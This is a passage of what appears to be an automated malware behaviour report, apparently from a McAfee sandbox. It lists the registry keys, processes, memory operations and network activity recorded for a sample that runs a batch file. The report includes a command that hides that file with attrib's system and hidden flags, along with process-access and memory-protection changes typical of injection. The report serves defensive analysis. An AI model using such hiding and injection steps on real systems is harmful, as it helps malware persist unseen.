HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127 ILUsageMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127 NIUsageMask

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default Latest

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default LegacyPolicyTimeStamp

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default index17

HKLM\Software\Microsoft\PowerShell\1\PowerShellEngine ApplicationBase

HKLM\Software\Microsoft\Windows NT\CurrentVersion InstallationType

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options DevOverrideEnable

HKLM\System\CurrentControlSet\Control\Session Manager\Environment PSMODULEPATH

Process Operations: 78

Process Created

Process Name Module

"c:\users\administrator\documents\pd.bat"

"c:\users\admini~1\docume~1\pd.bat"

"c:\users\administrator\documents\pd.bat"

"c:\windows\system32\attrib.exe" +s +h pd.bat

{00021401-0000-0000-C000-000000000046}

{1F3427C8-5C10-4210-AA03-2EE45287D668}

{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}

{25CD009F-FFBF-418A-8E11-7A877CAFCAF5}

{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}

{50EE5B75-5635-11D1-AC2A-D4EA0B000000}

{55C7A567-7B90-4885-9EDD-662D359ED389}

{603D3801-BD81-11D0-A3A5-00C04FD706EC}

{660B90C8-73A9-4B58-8CAE-355B7F55341B}

{6C467336-8281-4E60-8204-430CED96822D}

{6D49AC84-BEAD-11D1-A074-0080C740BFBD}

{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}

{7353C207-C0DA-45A1-93CC-47A853A736A1}

{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}

{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}

{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}

{8F170678-2A97-4D59-89A1-7A0A71C1B677}

{90AA3A4E-1CBA-4233-B8BB-535773D48449}

{A2A9545D-A0C2-42B4-9708-A0B2BADD77C8}

{DD313E04-FEFF-11D1-8ECD-0000F87A470C}

{E0629351-6F81-11D2-973F-00104B9B172F}

{E97F7176-7C91-4648-A0CE-94F37BF016F8}

{EFDB41B0-5538-42F1-995B-460DA31C0924}

{F3364BA0-65B9-11CE-A9BA-00AA004AE837}

{F5078F32-C551-11D3-89B9-0000F81FE221}

Process Opened

Process Name/Address PID/Process Name

Executed a shell command

c:\users\administrator\documents\pd.bat

powershell.exe QueryInformation

powershell.exe Terminate & CreateThread & SetSessionID & VMOperation & VMRead & VMWrite & DupHandle & CreateProcess & SetQuota & SetInformation & QueryInformation

powershell.exe VMRead & QueryInformation

searchindexer.exe Terminate & CreateThread & SetSessionID & VMOperation & VMRead & VMWrite & DupHandle & CreateProcess & SetQuota & SetInformation & QueryInformation

Process killed

Ended itself and all of its threads

Thread Created

72fe9a9f

73078014

Other

Changed the protection attribute of process address: 0x72f11fdc, new attribute: Execute_Read

Changed the protection attribute of process address: 0x72f11fdc, new attribute: Execute_ReadWrite

Changed the protection attribute of process address: 0x72f12be4, new attribute: Execute_ReadWrite

Decremented a thread's suspend count

Determined whether the specified process is running under WOW64

Enabled an application to supersede the top-level exception handler

Enum Process Name: armsvc.exe

Enum Process Name: audiodg.exe

Enum Process Name: cmd.exe

Enum Process Name: conhost.exe

Enum Process Name: csrss.exe

Enum Process Name: dwm.exe

Enum Process Name: excel.exe

Enum Process Name: explorer.exe

Enum Process Name: fxsction32.exe

Enum Process Name: lsass.exe

Enum Process Name: lsm.exe

Enum Process Name: mdm.exe

Enum Process Name: powershell.exe

Enum Process Name: schtasks.exe

Enum Process Name: searchindexer.exe

Enum Process Name: services.exe

Enum Process Name: smss.exe

Enum Process Name: spoolsv.exe

Enum Process Name: svchost.exe

Enum Process Name: system

Enum Process Name: taskhost.exe

Enum Process Name: tlntsvr.exe
Enum Process Name: wininit.exe

Enum Process Name: winlogon.exe

Enum Process Name: wmiprvse.exe

Enum Process Name: wsqmcons.exe

Initialized COM library for the current thread and set it in the concurrency mode

Obtained the contents of the specified variable from the environment block of the calling process

Obtained the identifier of the thread or process that created the specified window

Obtained the priority value for a thread

Opened the access token associated with a process

Opened the access token associated with a thread

Queried the activation context

Retrieved system information

Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses

Set the priority value for a thread

Network Operations: 3

Socket Activities

Closed the socket

Controlled the I/O mode of the newly created socket

Initiated WS2_32 socket DLL

Other Operations: 17

Signal Objects

Mutex-Object Name

Opened an existing named event object

global\.net clr networking

global\cordbipcsetupsyncevent_2532

global\cordbipcsetupsyncevent_2540

global\cordbipcsetupsyncevent_2548

global\cordbipcsetupsyncevent_2804

global\cordbipcsetupsyncevent_2808

Others

Allocated and initialized a security identifier (SID)

Converted a string-format security descriptor into a valid, functional security descriptor

Determined whether a specified security identifier (SID) is enabled in an access token

Enabled/disabled privileges in an access token

Expanded environment-variable strings and replaced them with the values defined for the current user

Initialized a new security descriptor

Obtained information about an access token

Recorded system information

Retrieved the user's logon name

Set information in a security discretionary access control list (DACL)

McAfee Active Response

Status: Product is not Available

© 2020 McAfee, LLC. All rights reserved.
© 2020 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.